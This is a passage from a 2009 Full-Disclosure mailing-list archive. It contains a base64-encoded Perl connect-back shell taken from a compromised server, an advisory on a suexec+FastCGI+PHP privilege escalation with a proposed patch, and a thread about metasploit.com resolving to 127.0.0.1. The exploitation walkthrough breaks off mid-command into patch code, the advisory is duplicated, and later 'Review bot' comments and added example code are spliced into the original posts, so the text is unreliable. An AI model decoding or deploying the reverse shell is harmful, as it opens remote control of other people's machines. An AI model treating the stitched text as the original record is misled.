> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
>
>

From jrogosky at gmail.com Wed Feb 11 03:01:34 2009
From: jrogosky at gmail.com (Justin Rogosky)
Date: Tue, 10 Feb 2009 22:01:34 -0500
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
 <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com>
Message-ID: <1234321294.20361.2.camel@Chrome>

Just as an FYI: Webscarab and Paros (web application proxies) both have a
good Base64 decoder built-in. This is useful for any sniffed request using
basic authentication as well.

--Justin

On Tue, 2009-02-10 at 14:34 -0500, sr. wrote:
> i really appreciate all of the responses. this is what community is all about.
>
> i'd seen the "==" in other encoding schemes, but just wasn't sure and
> wanted a quick response...thanks to everyone who responded!
>
> I'll post the rest of my findings on here asap. i'm looking into an
> old compromised machine. this is nothing new..
>
> whoever mentioned the r57 shell, you're probably right as the script
> connects to a remote box @ port 11457. this is r57 behaviour.
>
> i also found a copy of the same script i'm dissecting on someone
> else's box, you can check it out here:
> http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php
>
> in my case, a bunch of php files were modified. i'll zip everything up
> and host it so you can all analyze...
>
> thx,
>
> sr. aka "fabrizio siciliano"
>
>
> On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro wrote:
> > "Sr."
> >
> > This is base64 encoded.
> >
> > 2009/2/10 sr. :
> >> can anyone tell me what encoding this is?
> >>
> >> this has to do with old php 4.x.x version with magic quotes enabled.
> >> i'm just trying to figure out what the connect back code does.
> >>
> >> any input is much appreciated.
> >>
> >> thx,
> >>
> >> sr.
> >
> > --
> > Saludos,
> > Gustavo Castro Puig.
> > E-Mail: gcastrop at gmail.com
> >
> > LPI Level-1 Certified (https://www.lpi.org/es/verify.html
> > LPID:LPI000042304 Verification Code: hp6re8w5qg )
> > -----BEGIN GEEK CODE BLOCK-----
> > Version: 3.12
> > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o?
> > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++
> > D++ G++ e++ h--- r y+++
> > ------END GEEK CODE BLOCK------
> > Registered Linux User #69342
>
>

From andrew at amxl.com Wed Feb 11 09:56:42 2009
From: andrew at amxl.com (Andrew Miller)
Date: Wed, 11 Feb 2009 22:56:42 +1300
Subject: [Full-disclosure] Local vulnerability in suexec + FastCGI + PHP configurations
Message-ID: <4992A0DA.6080905@amxl.com>

DISCLAIMER: THIS SECURITY ADVISORY IS PROVIDED AS-IS, AND WITHOUT ANY
GUARANTEE OF ANY KIND THAT THE INFORMATION IS ACCURATE, OR THAT THE
WORKAROUND, SOLUTIONS, OR PATCHES PROVIDED WILL PROTECT SYSTEMS, OR THAT
THEY WILL NOT CREATE NEW PROBLEMS. THE AUTHOR ACCEPTS NO LIABILITY OF ANY
FORM FOR THE INFORMATION CONTAINED WITHIN OR THE CONSEQUENCES OF ITS USE
OR MISUSE.

Synopsis:

Most current installations of PHP set up to run via FastCGI with suexec are
vulnerable to a local exploit, where anyone with the ability to run code as
the user the webserver runs as can gain access as any user with an account
set up to run PHP. It is anticipated that this issue will especially affect
shared web hosts who use FastCGI + suexec thinking it will give them
additional security.

Conditions for exploitation:

=> PHP needs to be used via CGI or FastCGI.

=> The system must be set up to use suexec (rather than, say, having PHP
   run as an external FastCGI server).

=> The attacker must be able to run code as the same user that the
   webserver runs as. This is unlikely to be a problem for many local
   attackers, because there are a multitude of possible attack vectors,
   such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also
   installed), and likely numerous other options.

=> Depending on the configuration, setting an open_basedir might protect an
   installation. However, this only applies if open_basedir is set, and
   php-cgi is not installed directly into the web space but is instead
   called from a script which doesn't pass any parameters from the script
   command line.

Affected PHP versions:

=> All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at
   the date of this advisory are believed to be affected.
Vendor notification:

security at php.net has been informed of this issue. Antony Dovegal replied
to say:

"It's been agreed that we won't implement any more security hacks in PHP
itself since such things should be done by the OS, so no more magic INI
settings."

As such, it appears that the PHP developers do not intend to add any
technical measures against this vulnerability. It should be noted that
while this is a vulnerability in a way of installing PHP, it appears that
there is no way to securely set up a suexec + FastCGI + PHP installation
using an unpatched version of PHP, and so it is hoped that the PHP
developers will reconsider in time.

Work-arounds:

A proposed patch is provided later which can be applied to PHP to protect
against this vulnerability (when coupled with an appropriate
configuration). This patch has been briefly tested to ensure it works, but
requires more testing and review before it should be used in production.
No guarantees are made about it.

Using a permanently running external FastCGI process per user is an
alternative solution if the cost of these extra processes is tolerable.

Setting open_basedir from within php.ini may be a possible workaround (but
only if nowhere in open_basedir is writable to the attacker), and only if
PHP is called from a script which also sets SERVER_SOFTWARE and doesn't
pass through the command line arguments. For example:

#!/bin/bash
export SERVER_SOFTWARE=blah
/usr/bin/php-cgi -c /home/myuser/php.ini

Technical details of attack:

PHP does not place any restrictions on what it will run, even when called
from suexec. This means that by manipulating the environment variables
passed in to php-cgi when calling via suexec, an attacker can execute
arbitrary PHP scripts as the user who owns the PHP script (and if
SERVER_SOFTWARE is not set, can also pass in PHP code to be executed via
stdin).
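The work-around wrapper above only sets SERVER_SOFTWARE. The script below is a hardened version, added here as an example and not the advisory author's script: it also refuses to forward argv, and it applies in the wrapper the owner, mode and base-directory tests that the advisory's proposed patch makes inside php-cgi. It assumes the Action-handler layout from the advisory (Apache hands the requested script to the handler in PATH_TRANSLATED), GNU coreutils and glibc's getent on Linux, and a base directory of public_html under the user's home unless SUEXEC_BASE_DIR is set.

```shell
#!/bin/bash
# Added example: a suexec wrapper for php-cgi that validates the script it is
# about to run. Not the advisory's own script. Assumes GNU coreutils
# (readlink -f, stat -c), glibc getent, and the Apache "Action" layout in
# which the requested PHP file arrives in PATH_TRANSLATED.

# Home directory from the passwd database, as the patch's getpwuid() does
# (suexec does not pass HOME through to the child).
user_home=$(getent passwd "$(id -u)" | cut -d: -f6)

# Scripts may only run from below this directory (assumed location).
SUEXEC_BASE_DIR="${SUEXEC_BASE_DIR:-$user_home/public_html}"

# check_script_path SCRIPT BASE_DIR
# Succeeds (exit 0) only when SCRIPT resolves, symlinks included, to a regular
# file under BASE_DIR that is owned by the effective user, has the user execute
# bit set and is neither group- nor world-writable: the same conditions the
# proposed patch tests on statbuf in cgi_main.c.
check_script_path() {
    local script="$1" base real perm
    [ -n "$script" ] || return 1
    # Canonicalise the base dir and force a trailing slash so the prefix test
    # cannot match a sibling such as public_html2 (fail closed if it is bad).
    base=$(readlink -f -- "${2%/}" 2>/dev/null) || return 1
    base="$base/"
    real=$(readlink -f -- "$script" 2>/dev/null) || return 1   # like tsrm_realpath()
    [ -f "$real" ] || return 1                                  # stat must succeed, regular file
    case "$real" in
        "$base"*) ;;                                            # inside the base directory
        *) return 1 ;;
    esac
    [ -O "$real" ] || return 1                                  # st_uid == geteuid()
    perm=$(stat -c '%a' -- "$real") || return 1                 # octal mode bits, e.g. 755
    [ $(( 0$perm & 0100 )) -ne 0 ] || return 1                  # user execute bit set
    [ $(( 0$perm & 022 )) -eq 0 ] || return 1                   # not group/world writable
    return 0
}

# run_php_cgi: used only when Apache (via suexec) invokes this wrapper.
run_php_cgi() {
    local script="${PATH_TRANSLATED:-}" real
    # Forces php-cgi into CGI mode, so it will not read a script from stdin
    # (the advisory's second route when SERVER_SOFTWARE is unset).
    export SERVER_SOFTWARE="suexec-php-wrapper"
    if ! check_script_path "$script" "$SUEXEC_BASE_DIR"; then
        printf 'Status: 403 Forbidden\r\nContent-Type: text/plain\r\n\r\n'
        printf 'Script rejected by suexec wrapper\n'
        exit 1
    fi
    # Hand php-cgi the validated real path in both variables it may consult,
    # so the environment cannot steer it to a different file.
    real=$(readlink -f -- "$script")
    export PATH_TRANSLATED="$real" SCRIPT_FILENAME="$real"
    # "$@" is deliberately not forwarded: argv never reaches php-cgi.
    exec /usr/bin/php-cgi -c "$user_home/php.ini"
}

# Only act when running as a CGI handler; otherwise (e.g. sourced for testing)
# just define the functions and do nothing.
if [ -n "${GATEWAY_INTERFACE:-}${REQUEST_METHOD:-}" ]; then
    run_php_cgi
fi
```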
The filtering of environment variables by suexec does not protect against this attack, because the environment variables needed to perform the attack are passed through suexec. Likewise, setting doc_root and user_dir in php.ini (as recommended in the security section of the PHP manual) provides no protection, as the attacker has full control of environments indicating the base directory. Example of exploitation: Suppose that suexec php is set up as follows: In /home/wwjargon/public_html/php.fcgi we have: #!/bin/bash /usr/bin/php-cgi -c /home/wwjargon/php.ini In .htaccess we have: Action php-fcgi /php.fcgi AddHandler php-fcgi .php This is a fairly common set up. It can be exploited as follows (www-data is the username the webserver runs as): $ whoami www-data $ cat >/tmp/exploit.php #include "win32/php_registry.h" #endif +#ifdef HAVE_PWD_H +#include +#endif #ifdef __riscos__ #include @@ -170,6 +173,10 @@ zend_bool impersonate; # endif #endif +#ifdef HAVE_PWD_H + char* suexec_base_dir; + char* suexec_user_dir; +#endif } php_cgi_globals_struct; #ifdef ZTS @@ -1232,6 +1239,10 @@ STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals) # endif #endif +#ifdef HAVE_PWD_H + STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals) + STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals) +#endif PHP_INI_END() /* {{{ php_cgi_globals_ctor @@ -1254,6 +1265,10 @@ php_cgi_globals->impersonate = 0; # endif #endif +#ifdef HAVE_PWD_H + php_cgi_globals->suexec_base_dir = NULL; + php_cgi_globals->suexec_user_dir = NULL; +#endif } /* }}} */ 
@@ -1708,6 +1723,10 @@ #if PHP_FASTCGI && !fastcgi #endif +#ifdef HAVE_PWD_H + && CGIG(suexec_base_dir) == NULL + && CGIG(suexec_user_dir) == NULL +#endif ) { while ((c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) { switch (c) { @@ -1884,6 +1903,10 @@ #if PHP_FASTCGI || fastcgi #endif +#ifdef HAVE_PWD_H + || CGIG(suexec_base_dir) != NULL + || CGIG(suexec_user_dir) != NULL +#endif ) { file_handle.type = ZEND_HANDLE_FILENAME; 
@@ -1922,9 +1945,49 @@ */ retval = FAILURE; if (cgi || SG(request_info).path_translated) { +#ifdef HAVE_PWD_H + zend_bool path_ok = !(CGIG(suexec_base_dir) || + CGIG(suexec_user_dir)); + if (!path_ok && SG(request_info).path_translated) + { + struct stat statbuf; + char *real_path = tsrm_realpath(SG(request_info).path_translated, NULL TSRMLS_CC); + + virtual_stat(SG(request_info).path_translated, &statbuf TSRMLS_CC); + /* Only execute if the script is owned by the current user, + * the user execute bit is set, and it is not group or world + * writable. + */ + if (statbuf.st_uid == geteuid() && + (statbuf.st_mode & 0100) == 0100 && + (statbuf.st_mode & 022) == 0) { + if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) { + path_ok = 1; + } + if (!path_ok && CGIG(suexec_user_dir)) { + struct passwd* pw = getpwuid(geteuid()); + size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2; + char * user_dir = malloc(len); + strcpy(user_dir, pw->pw_dir); + strlcat(user_dir, "/", len); + strlcat(user_dir, CGIG(suexec_user_dir), len); + strlcat(user_dir, "/", len); + if (!strncmp(real_path, user_dir, len - 1)) + path_ok = 1; + free(user_dir); + } + free(real_path); + } + } + + if (path_ok) { +#endif if (!php_check_open_basedir(SG(request_info).path_translated TSRMLS_CC)) { retval = php_fopen_primary_script(&file_handle TSRMLS_CC); } +#ifdef HAVE_PWD_H + } +#endif } /* if we are unable to open path_translated and we are not Usage of the patch: => Apply to PHP 5.2.8 and rebuild and install php-cgi. => Replace the scripts in the web directory with a script like: #!/bin/bash /usr/bin/php-cgi -c /etc/php.ini Then in php.ini, you have two new configuration options: cgi.suexec_base_dir cgi.suexec_user_dir If either of these directives are set, extra security checks are enabled. If both are set, the security checks for one or the other of the directives must pass. 
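Review bot: in the @@ -1232 hunk the two new STD_PHP_INI_ENTRY lines introduce cgi.suexec_base_dir and cgi.suexec_user_dir without any documentation: the diff touches only cgi_main.c, so neither sample php.ini gains an entry describing them, and nothing records that they are PHP_INI_SYSTEM on purpose (a per-directory or ini_set() override would defeat the check). Add commented entries to the sample ini files stating that suexec_base_dir is compared as a plain prefix and should end in a slash, as the usage notes say.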
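Review bot: in the @@ -1708 hunk the added `&& CGIG(suexec_base_dir) == NULL` / `&& CGIG(suexec_user_dir) == NULL` terms make php-cgi skip the whole php_getopt() loop as soon as either directive is set, so any argument handled in that loop is dropped silently rather than rejected. Put a comment above the condition saying this is intentional (argv must not be able to name the script under suexec) and state in the directive descriptions which options still apply, since the recommended wrapper passes -c.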
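Review bot: the @@ -1922 hunk has several unchecked failure paths: the return value of virtual_stat() is ignored, so when the stat fails statbuf is read uninitialised and the uid/mode tests run on garbage; tsrm_realpath() returns NULL for a path it cannot resolve and real_path then goes straight into strncmp(); getpwuid() can return NULL before pw->pw_dir is used; and malloc() is unchecked. real_path is also only freed inside the `if (statbuf.st_uid == geteuid() && ...)` block, so it leaks on every rejected request. Suggest guarding the block with `if (real_path && virtual_stat(...) == 0 && ...)`, checking pw for NULL, leaving path_ok at 0 on any failure, and moving free(real_path) after the outer if. Separately, the check stats path_translated while the file is only opened later by php_fopen_primary_script(), leaving a window in which the file can be swapped; an fstat() on the opened handle, or opening first and checking the descriptor, would close it.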
cgi.suexec_base_dir restricts script execution to paths starting with the directive (include a trailing slash if you don't want it to be used as a prefix). cgi.suexec_user_dir gives a path relative to the users home directory where PHP will execute code from. In addition, any PHP scripts to be executed must be owned by the same user, have the execute bit set, and not be group or world writable. From sec.432 at amxl.com Wed Feb 11 10:22:51 2009 
From: sec.432 at amxl.com (Andrew Miller)
Date: Wed, 11 Feb 2009 23:22:51 +1300
Subject: [Full-disclosure] Local vulnerability in suexec + FastCGI + PHP configurations
Message-ID: <4992A6FB.3020202@amxl.com>

DISCLAIMER: THIS SECURITY ADVISORY IS PROVIDED AS-IS, AND WITHOUT ANY GUARANTEE OF ANY KIND THAT THE INFORMATION IS ACCURATE, OR THAT THE WORKAROUND, SOLUTIONS, OR PATCHES PROVIDED WILL PROTECT SYSTEMS, OR THAT THEY WILL NOT CREATE NEW PROBLEMS. THE AUTHOR ACCEPTS NO LIABILITY OF ANY FORM FOR THE INFORMATION CONTAINED WITHIN OR THE CONSEQUENCES OF ITS USE OR MISUSE.

Synopsis:

Most current installations of PHP set up to run via FastCGI with suexec are vulnerable to a local exploit, where anyone with the ability to run code as the user the webserver runs as can gain access as any user with an account set up to run PHP. It is anticipated that this issue will especially affect shared web hosts who use FastCGI + suexec thinking it will give them additional security.

Conditions for exploitation:

=> PHP needs to be used via CGI or FastCGI.
=> The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server).
=> The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options.
=> Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line.

Affected PHP versions:

=> All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected.
Vendor notification:

security at php.net has been informed of this issue. Antony Dovgal replied to say:

"It's been agreed that we won't implement any more security hacks in PHP itself since such things should be done by the OS, so no more magic INI settings."

As such, it appears that the PHP developers do not intend to add any technical measures against this vulnerability. It should be noted that while this is a vulnerability in a way of installing PHP, it appears that there is no way to securely set up a suexec + FastCGI + PHP installation using an unpatched version of PHP, and so it is hoped that the PHP developers will reconsider in time.

Work-arounds:

A proposed patch is provided later which can be applied to PHP to protect against this vulnerability (when coupled with an appropriate configuration). This patch has been briefly tested to ensure it works, but requires more testing and review before it should be used in production. No guarantees are made about it.

Using a permanently running external FastCGI process per user is an alternative solution if the cost of these extra processes is tolerable.

Setting open_basedir from within php.ini may be a possible workaround (but only if nowhere in open_basedir is writable to the attacker), but only if PHP is called from a script which also sets SERVER_SOFTWARE and doesn't pass through the command line arguments. For example:

#!/bin/bash
export SERVER_SOFTWARE=blah
/usr/bin/php-cgi -c /home/myuser/php.ini

Technical details of attack:

PHP does not place any restrictions on what it will run, even when called from suexec. This means that by manipulating the environment variables passed in to php-cgi when calling via suexec, an attacker can execute arbitrary PHP scripts with the user of the owner of the PHP script (and if SERVER_SOFTWARE is not set, can also pass in PHP code to be executed via stdin).
The filtering of environment variables by suexec does not protect against this attack, because the environment variables needed to perform the attack are passed through suexec. Likewise, setting doc_root and user_dir in php.ini (as recommended in the security section of the PHP manual) provides no protection, as the attacker has full control of environments indicating the base directory. Example of exploitation: Suppose that suexec php is set up as follows: In /home/wwjargon/public_html/php.fcgi we have: #!/bin/bash /usr/bin/php-cgi -c /home/wwjargon/php.ini In .htaccess we have: Action php-fcgi /php.fcgi AddHandler php-fcgi .php This is a fairly common set up. It can be exploited as follows (www-data is the username the webserver runs as): $ whoami www-data $ cat >/tmp/exploit.php #include "win32/php_registry.h" #endif +#ifdef HAVE_PWD_H +#include +#endif #ifdef __riscos__ #include @@ -170,6 +173,10 @@ zend_bool impersonate; # endif #endif +#ifdef HAVE_PWD_H + char* suexec_base_dir; + char* suexec_user_dir; +#endif } php_cgi_globals_struct; #ifdef ZTS @@ -1232,6 +1239,10 @@ STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals) # endif #endif +#ifdef HAVE_PWD_H + STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals) + STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals) +#endif PHP_INI_END() /* {{{ php_cgi_globals_ctor @@ -1254,6 +1265,10 @@ php_cgi_globals->impersonate = 0; # endif #endif +#ifdef HAVE_PWD_H + php_cgi_globals->suexec_base_dir = NULL; + php_cgi_globals->suexec_user_dir = NULL; +#endif } /* }}} */ 
@@ -1708,6 +1723,10 @@ #if PHP_FASTCGI && !fastcgi #endif +#ifdef HAVE_PWD_H + && CGIG(suexec_base_dir) == NULL + && CGIG(suexec_user_dir) == NULL +#endif ) { while ((c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) { switch (c) { @@ -1884,6 +1903,10 @@ #if PHP_FASTCGI || fastcgi #endif +#ifdef HAVE_PWD_H + || CGIG(suexec_base_dir) != NULL + || CGIG(suexec_user_dir) != NULL +#endif ) { file_handle.type = ZEND_HANDLE_FILENAME; 
@@ -1922,9 +1945,49 @@ */ retval = FAILURE; if (cgi || SG(request_info).path_translated) { +#ifdef HAVE_PWD_H + zend_bool path_ok = !(CGIG(suexec_base_dir) || + CGIG(suexec_user_dir)); + if (!path_ok && SG(request_info).path_translated) + { + struct stat statbuf; + char *real_path = tsrm_realpath(SG(request_info).path_translated, NULL TSRMLS_CC); + + virtual_stat(SG(request_info).path_translated, &statbuf TSRMLS_CC); + /* Only execute if the script is owned by the current user, + * the user execute bit is set, and it is not group or world + * writable. + */ + if (statbuf.st_uid == geteuid() && + (statbuf.st_mode & 0100) == 0100 && + (statbuf.st_mode & 022) == 0) { + if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) { + path_ok = 1; + } + if (!path_ok && CGIG(suexec_user_dir)) { + struct passwd* pw = getpwuid(geteuid()); + size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2; + char * user_dir = malloc(len); + strcpy(user_dir, pw->pw_dir); + strlcat(user_dir, "/", len); + strlcat(user_dir, CGIG(suexec_user_dir), len); + strlcat(user_dir, "/", len); + if (!strncmp(real_path, user_dir, len - 1)) + path_ok = 1; + free(user_dir); + } + free(real_path); + } + } + + if (path_ok) { +#endif if (!php_check_open_basedir(SG(request_info).path_translated TSRMLS_CC)) { retval = php_fopen_primary_script(&file_handle TSRMLS_CC); } +#ifdef HAVE_PWD_H + } +#endif } /* if we are unable to open path_translated and we are not Usage of the patch: => Apply to PHP 5.2.8 and rebuild and install php-cgi. => Replace the scripts in the web directory with a script like: #!/bin/bash /usr/bin/php-cgi -c /etc/php.ini Then in php.ini, you have two new configuration options: cgi.suexec_base_dir cgi.suexec_user_dir If either of these directives are set, extra security checks are enabled. If both are set, the security checks for one or the other of the directives must pass. 
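Review bot: the two STD_PHP_INI_ENTRY lines in the @@ -1232,6 +1239,10 @@ hunk correctly use PHP_INI_SYSTEM, so neither directive can be relaxed at runtime by ini_set() or per-directory settings, but the patch ships no php.ini-dist / php.ini-recommended entries for them, so the only documentation of the options is the prose in the usage section; add commented-out `;cgi.suexec_base_dir =` and `;cgi.suexec_user_dir =` lines there, carrying the trailing-slash note, so an administrator rebuilding php-cgi can find them.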
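Review bot: the @@ -1708,6 +1723,10 @@ hunk skips the whole php_getopt() loop as soon as either directive is set, so any remaining command-line arguments handed to php-cgi (a script name, or -f) are dropped without a diagnostic; rejecting unexpected arguments with an error would be safer than ignoring them and would make a misconfigured wrapper script visible instead of silently changing its meaning.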
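Review bot: the condition added in the @@ -1884,6 +1903,10 @@ hunk is the hand-written negation of the one added at @@ -1708, and the patch is only correct while the two stay in step (if they drift, a run could skip option parsing yet still fall through to the argv/stdin script path); factor `CGIG(suexec_base_dir) != NULL || CGIG(suexec_user_dir) != NULL` into one helper macro and use it in both places.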
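Review bot: in the @@ -1922,9 +1945,49 @@ hunk the return values of tsrm_realpath() and virtual_stat() are never checked, so when path_translated does not resolve, statbuf is read uninitialised and real_path is NULL by the time it reaches strncmp(); the check should fail closed instead, e.g. `if (real_path == NULL || virtual_stat(...) != 0) { path_ok = 0; }` before the ownership test, and getpwuid() and malloc() can likewise return NULL and are dereferenced unchecked. Two smaller points: the mode tests read better as S_IXUSR and (S_IWGRP | S_IWOTH) than as 0100 and 022, and the base_dir comparison is a raw strncmp() prefix, so "/home/www" also admits "/home/www2/x.php" unless the administrator remembers the trailing slash; normalising a trailing slash in code would remove that trap. Finally, a refused script just leaves retval at FAILURE; logging the rejected path through the SAPI error log would let an administrator notice attempts to run scripts outside the configured directories.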
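The eligibility test the patch performs (owner, mode bits, and the base_dir/user_dir prefix) as a stand-alone C function; this is an added example, not code from the advisory or from PHP, and it differs from the patch in failing closed on every lookup error and in matching base_dir on a directory boundary rather than as a raw prefix. The names suexec_script_allowed, path_has_dir_prefix and suexec_self_test are mine, and the self-test writes a constructed script under /tmp.

```c
#define _DEFAULT_SOURCE 1           /* realpath(), mkdtemp() on glibc */
#include <limits.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if path lies inside directory dir on a component boundary, so a base
 * of "/srv/www" does not admit "/srv/www2/x.php". Trailing '/' ignored. */
static int path_has_dir_prefix(const char *path, const char *dir)
{
    size_t n = strlen(dir);
    while (n > 1 && dir[n - 1] == '/')
        n--;
    if (n == 1 && dir[0] == '/')
        return path[0] == '/';
    return strncmp(path, dir, n) == 0 && path[n] == '/';
}

/* The policy the posted patch enforces before opening the primary script.
 * base_dir / user_dir play the role of cgi.suexec_base_dir / cgi.suexec_user_dir
 * (either may be NULL; both NULL disables the policy, as in the patch).
 * Unlike the patch, every lookup failure is a refusal, never undefined behaviour. */
int suexec_script_allowed(const char *path, const char *base_dir,
                          const char *user_dir)
{
    char real[PATH_MAX], home_dir[PATH_MAX];
    struct stat st;
    struct passwd *pw;
    int ok = 0, n;

    if (base_dir == NULL && user_dir == NULL)
        return 1;
    if (path == NULL || realpath(path, real) == NULL)
        return 0;                       /* unresolvable path: fail closed */
    if (stat(real, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    /* Owned by the effective user, user-executable, not group/world writable:
     * the three conditions the patch tests on statbuf. */
    if (st.st_uid != geteuid() || !(st.st_mode & S_IXUSR) ||
        (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;
    if (base_dir != NULL)
        ok = path_has_dir_prefix(real, base_dir);
    if (!ok && user_dir != NULL) {
        pw = getpwuid(geteuid());       /* NULL if the uid has no entry */
        if (pw == NULL || pw->pw_dir == NULL)
            return 0;
        n = snprintf(home_dir, sizeof home_dir, "%s/%s", pw->pw_dir, user_dir);
        if (n > 0 && (size_t)n < sizeof home_dir)
            ok = path_has_dir_prefix(real, home_dir);
    }
    return ok;
}

/* Exercises the policy on a constructed script in a temporary directory.
 * Returns 0 if every case behaves as expected, else the first failing case
 * number. The user_dir branch needs a real home directory and is not run. */
int suexec_self_test(void)
{
    char dir[] = "/tmp/suexec_demo_XXXXXX";
    char base[PATH_MAX], script[PATH_MAX], missing[PATH_MAX], sibling[PATH_MAX];
    FILE *f;
    int rc = 0;

    if (mkdtemp(dir) == NULL || realpath(dir, base) == NULL)
        return 100;
    snprintf(script, sizeof script, "%s/index.php", base);
    snprintf(missing, sizeof missing, "%s/missing.php", base);
    /* base minus its last character: a string prefix, but not a directory */
    snprintf(sibling, sizeof sibling, "%.*s", (int)strlen(base) - 1, base);
    if ((f = fopen(script, "w")) == NULL)
        return 101;
    fputs("<?php echo 'constructed sample'; ?>\n", f);
    fclose(f);

    chmod(script, 0666);                /* group/world writable, no exec bit */
    if (suexec_script_allowed(script, NULL, NULL) != 1) rc = 1;   /* disabled */
    if (!rc && suexec_script_allowed(script, base, NULL) != 0) rc = 2;
    chmod(script, 0700);                /* owner-only and executable */
    if (!rc && suexec_script_allowed(script, base, NULL) != 1) rc = 3;
    chmod(script, 0600);                /* execute bit cleared */
    if (!rc && suexec_script_allowed(script, base, NULL) != 0) rc = 4;
    chmod(script, 0700);
    if (!rc && suexec_script_allowed(script, "/nonexistent/base", NULL) != 0) rc = 5;
    if (!rc && suexec_script_allowed(script, sibling, NULL) != 0) rc = 6;
    if (!rc && suexec_script_allowed(missing, base, NULL) != 0) rc = 7;

    unlink(script);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = suexec_self_test();
    printf("suexec policy self-test: %s (case %d)\n", rc ? "FAILED" : "ok", rc);
    return rc;
}
```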
cgi.suexec_base_dir restricts script execution to paths starting with the directive (include a trailing slash if you don't want it to be used as a prefix). cgi.suexec_user_dir gives a path relative to the user's home directory where PHP will execute code from.

In addition, any PHP scripts to be executed must be owned by the same user, have the execute bit set, and not be group or world writable.

From staticrez at gmail.com Wed Feb 11 15:00:31 2009
From: staticrez at gmail.com (sr.)
Date: Wed, 11 Feb 2009 10:00:31 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To:
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>
Message-ID: <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com>

.org is now being affected as well.

On Wed, Feb 11, 2009 at 3:11 AM, alessandro telami wrote:
> I'm seeing the same on my Network.
>
> Cyber-threats
>
> ________________________________
> Date: Tue, 10 Feb 2009 16:08:38 -0600
> From: vigilantgregorius at gmail.com
> To: staticrez at gmail.com
> CC: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] metasploit.com = 127.0.0.1
>
> DDOS
>
> On Tue, Feb 10, 2009 at 4:05 PM, sr. wrote:
>
> anybody else seeing this?
>
> can't get to metasploit because it's currently resolving to 127.0.0.1
>
> sr.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From michael.holstein at csuohio.edu Wed Feb 11 15:17:42 2009
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Wed, 11 Feb 2009 10:17:42 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com>
